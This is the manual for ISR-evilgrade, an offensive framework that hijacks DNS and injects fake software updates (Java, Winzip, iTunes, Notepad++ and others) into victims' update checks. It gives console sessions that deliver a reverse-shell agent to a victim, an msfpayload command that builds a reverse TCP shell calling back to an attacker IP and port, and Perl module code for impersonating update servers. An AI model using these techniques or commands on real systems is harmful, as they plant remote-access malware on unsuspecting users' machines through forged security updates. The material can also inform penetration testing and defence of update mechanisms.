-- ISR - Infobyte Security Research -- | ISR-evilgrade | www.infobyte.com.ar | ..:: DESCRIPTION ISR-evilgrade: is a modular framework that allow us to take advantage of poor upgrade implementations by injecting fake updates. * How does it work? It works with modules, each module implements the structure needed to emulate a false update of specific applications/systems. Evilgrade needs the manipulation of the victim dns traffic. Attack vectors: -------------- Internal scenary: - Internal DNS access - ARP spoofing - DNS Cache Poisoning - DHCP spoofing External scenary: - Internal DNS access - DNS Cache Poisoning * What are the supported OS? The framework is multiplaform, it only depends of having the right payload for the target platform to be exploited. Implemented modules: ------------------- - Java plugin - Winzip - Winamp - MacOS - OpenOffices - iTunes - Linkedin Toolbar - DAP [Download Accelerator] - notepad++ - speedbit ..:: USE It works similar to a IOS console evilgrade>help Type 'help command' for more detailed help on a command. Commands: configure - Configure - no help available exit - exits the program help - prints this screen, or help on 'command' reload - Reload to update all the modules - no help available restart - Restart webserver - no help available set - Configure variables - no help available show - Display information of . start - Start webserver - no help available status - Get webserver status - no help available stop - Stop webserver - no help available version - Display framework version. - no help available #### Show implemented modules evilgrade>show modules List of modules: =============== sunjava winzip winscp speedbit linkedin winamp openoffice itunes osx notepadplus dap #### Configure specified module evilgrade>conf sunjava evilgrade(sunjava)> #### Show modules's options #### VirtualHost is webserver that we are going to emulate (master webserver update of java) #### agent: it is our fake update binary, we have to set a path or implement a dinamic fake update binary generation (see ADVANCE) evilgrade(sunjava)>show options Display options: =============== Name = Sun Microsystems Java Version = 1.0 Author = ["Francisco Amato < famato +[AT]+ infobyte.com.ar>"] Description = "" VirtualHost = "java.sun.com" .-------------------------------------------------------------------------------------------------------------------------. | Name | Default | Description | +--------------+-------------------------------------------------+--------------------------------------------------------+ | website | http://java.com/moreinfolink | Website displayed in the update | | enable | 1 | Status | | atitle | Critical vulnerability | Title name to be displayed in the systray item popup | | arg | | Arg passed to Agent | | adescription | This critical update fix internal vulnerability | Description to be displayed in the systray item popup | | description | This critical update fix internal vulnerability | Description to be displayed during the update | | agent | ./agent/reverseshellsign.exe | Agent to inject | | title | Critical update | Title name displayed in the update | '--------------+-------------------------------------------------+--------------------------------------------------------' #### Start the fake update server evilgrade>start evilgrade> [25/7/2008:4:53:45] - [WEBSERVER] - Webserver ready. Waiting for connections ... #### Waiting for victims evilgrade> [25/7/2008:4:58:25] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/update/[.\\d]+/map\\-[.\\d]+.xml" evilgrade> [25/7/2008:4:58:26] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/java_update.xml\$" evilgrade> [25/7/2008:4:58:39] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: ".exe" evilgrade> [25/7/2008:4:58:40] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Agent sent: "./agent/reverseshell.exe" #### Show status and victims logs evilgrade>show status Webserver (pid 4134) already running Users status: ============ .---------------------------------------------------------------------------------------------------------------. | Client | Module | Status | Md5,Cmd,File | +----------------+------------------+--------+------------------------------------------------------------------+ | 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" | '----------------+------------------+--------+------------------------------------------------------------------' ..:: USAGE ####################################### version - Display framework version. ####################################### configure - Configure Example: ------- evilgrade>configure sunjava evilgrade(sunjava)> evilgrade>conf sunjava evilgrade(sunjava)> ## back to the global configuration evilgrade(sunjava)>conf evilgrade> ####################################### reload - Reload to get all modules update (to refresh modules modification in the source code) ####################################### start - Start webserver ####################################### restart - Restart webserver (fake update server) ####################################### stop - Stop webserver (fake update server) ####################################### status - Get webserver and victims status Example: ------- evilgrade>show status Webserver (pid 4134) already running Users status: ============ .---------------------------------------------------------------------------------------------------------------. | Client | Module | Status | Md5,Cmd,File | +----------------+------------------+--------+------------------------------------------------------------------+ | 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" | '----------------+------------------+--------+------------------------------------------------------------------' ####################################### show - Display information of . ####################################### show active - Display active modules in the webserver ####################################### show modules - Display implemented modules ######################################### show options - Display modules/global options Example: ------- evilgrade>show options Display options: =============== .-----------------------------------------. | Name | Default | Description | +-------+---------+-----------------------+ | debug | 0 | Debug mode | | port | 80 | Webserver listening port | '-------+---------+-----------------------' - evilgrade(sunjava)>show options Display options: =============== Name = Sun Microsystems Java Version = 1.0 Author = ["Francisco Amato < famato +[AT]+ infobyte.com.ar>"] Description = "" VirtualHost = "java.sun.com" .-------------------------------------------------------------------------------------------------------------------------. | Name | Default | Description | +--------------+-------------------------------------------------+--------------------------------------------------------+ | website | http://java.com/moreinfolink | Website displayed in the update | | enable | 1 | Status | | atitle | Critical vulnerability | Title name to be displayed in the systray item popup | | arg | | Arg passed to Agent | | adescription | This critical update fix internal vulnerability | Description to be displayed in the systray item popup | | description | This critical update fix internal vulnerability | Description to be displayed during the update | | agent | ./agent/reverseshellsign.exe | Agent to inject | | title | Critical update | Title name displayed in the update | '--------------+-------------------------------------------------+--------------------------------------------------------' ######################################### set - Configure variables global or modules Example: ------- evilgrade>show options Display options: =============== .-----------------------------------------. | Name | Default | Description | +-------+---------+-----------------------+ | debug | 0 | Debug mode | | port | 80 | Webserver listening port | '-------+---------+-----------------------' evilgrade>set debug 1 set debug, 1 evilgrade>show options Display options: =============== .-----------------------------------------. | Name | Default | Description | +-------+---------+-----------------------+ | debug | 1 | Debug mode | | port | 80 | Webserver listening port | '-------+---------+-----------------------' evilgrade> ############################### exit - exits the program ####################################### help - prints this screen, or help on 'command' ####################################### ..:: DEMO http://www.infobyte.com.ar/demo/evilgrade.htm ..:: ADVANCED Modules Options: Each module have special options, but the option "agent" is always present. agent: it is our fake update binary, we have to set a path or implement a dinamic fake update binary generation Dinamic fake update binary allows the execution of an external command to generate our binary, for example using msfpayload of metasploit. With this feature we can import any payload of metasploit or use an external interface to create the binary. Example: evilgrade(sunjava)>set agent '["/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]' evilgrade(sunjava)> In this case for every required update binary we generate a fake update binary with the payload "windows/shell_reverse_tcp" using to connect reverse ip address 192.168.233.2 port 4141 The label <%OUT%><%OUT> is a special tag to detect where the output binary is going to be generated. Evilgrade detect the using of "Dinamic fake update binary feature" because we use a command between square brackets "[]" Inside the brackets we have another string between "" that is compiled using perl. For example if we use: evilgrade(sunjava)>set agent '["./generatebin -o <%OUT%>/tmp/update".int(rand(256)).".exe<%OUT%>"]' Every time we get binary request, evilgrade will compile the line and execute the final string "./generatebin -o /tmp/update(random).exe" ..:: MODULE DEVELOPMENT Module development is very simple. You have to use a package .pm We are going to describe the sunjava update module (comments with #): package modules::sunjava; #name of package use strict; use Data::Dump qw(dump); #internal use my $base= { 'name' => 'Sun Microsystems Java', #name of the module display in the framework 'version' => '1.0', #internal module version 'appver' => '< 1.6.0_03', #last application version tested with this evilgrade module 'author' => [ 'Francisco Amato < famato +[AT]+ infobyte.com.ar>' ], #author 'description' => qq{}, #small description 'vh' => 'java.sun.com', #The first host use the application to search the update configuration files and update binaries #Then we have the request object's collection 'request' => [ #Each object it's a possible HTTP request inside the virtualhost configured for the module (java.sun.com) { 'req' => '^/update/[.\d]+/map\-[.\d]+.xml', #It's the requeried URL (regex friendly) 'type' => 'file', #it's the type of response (file|string|agent|install) #can we use: #file: response with content file reference in the "file" option below (./include/sunjava_map.xml) #string: response with a string reference in the "string" options below #agent: response with content file reference in the "agent" options (options section) #install: response with content file reference in the "file" option below # it's use to know if the fake update was execute # In some update process we can specify a final page after update installed # so we send to a controller page. 'method' => '', #not implemented 'bin' => '', #set 1 if we are going to send a binary file 'string' => '', #if we choose the type string in this variable we set the response 'parse' => '', #set 1 if the file or string need be parsed with the options 'file' => './include/sunjava_map.xml' #the path of file to send }, { 'req' => '^/java_update.xml$', 'type' => 'file', 'method' => '', 'bin' => '', 'string' => '', 'parse' => '1', #In this case we parse the file #To parse the file we use special tags <%OPTIONAME%> inside the "file" or "string" #This tags are reemplaced with the values of the options for example #<%TITLE%> will be reemplaced by 'Critical update' 'file' => './include/sunjava_update.xml' }, { 'req' => '.exe', 'type' => 'agent', #Here we have a agent type and a binary response 'bin' => 1, 'method' => '', #any 'string' => '', 'parse' => '', 'file' => '' } ], #Here we have the options displayed when we are in the conf mode of the module and we send the command "show options" #This options are used to parse the string or a file using in the responses 'options' => { 'agent' => { 'val' => './agent/reverseappsign.exe', #VAL is the default value 'desc' => 'Agent to inject'}, #DESC is minimal description 'arg' => { 'val' => '', 'desc' => 'Arg passed to Agent'}, 'enable' => { 'val' => 1, 'desc' => 'Status'}, #The following is a dynamic hidden option, #In this case we use the tag <%NAME%> to parse the files and execute perl functions to get randoms values #You can use whatever you like in perl, for more function see "isrcore/utils.pm" 'name' => { 'val' => "'javaupdate'.isrcore::utils::RndAlpha(isrcore::utils::RndNum(1))", 'hidden' => 1, 'dynamic' =>1,}, #All the options depend of the update process. You have to research the possible variables and implement it in your module #These are the common update messages, webpages, descriptions, popup messages, title, etc 'title' => { 'val' => 'Critical update', 'desc' => 'Title name displayed in the update'}, 'description' => { 'val' => 'This critical update fix internal vulnerability', 'desc' => 'Description to be displayed during the update'}, 'atitle' => { 'val' => 'Critical vulnerability', 'desc' => 'Title name to be displayed in the systray item popup'}, 'adescription' => { 'val' => 'This critical update fix internal vulnerability', 'desc' => 'Description to be displayed in the systray item popup'}, 'website' => { 'val' => 'http://java.com/moreinfolink', 'desc' => 'Website displayed in the update'} } }; ..:: REQUIREMENTS Perl Modules: Data::Dump [http://search.cpan.org/CPAN/authors/id/G/GA/GAAS/Data-Dump-1.08.tar.gz] Digest::MD5 [http://search.cpan.org/CPAN/authors/id/G/GA/GAAS/Digest-MD5-2.36.tar.gz] Time::HiRes [http://search.cpan.org/CPAN/authors/id/J/JH/JHI/Time-HiRes-1.9715.tar.gz] ..:: MORE INFORMATION Presentation: http://www.infobyte.com.ar/down/Francisco-Amato-evilgrade-ENG.html This framework was presented in the following security conferences: ekoparty 2007 [Buenos Aires, Argentina] [www.ekoparty.com.ar] Troopers 2008 [Munich, Germany] [www.troopers08.org] Shakacon 2008 [Hawaii, USA] [www.shakacon.org] ..:: DOWNLOAD http://www.infobyte.com.ar/developments.html ..:: AUTHOR Francisco Amato famato+at+infobyte+dot+com+dot+ar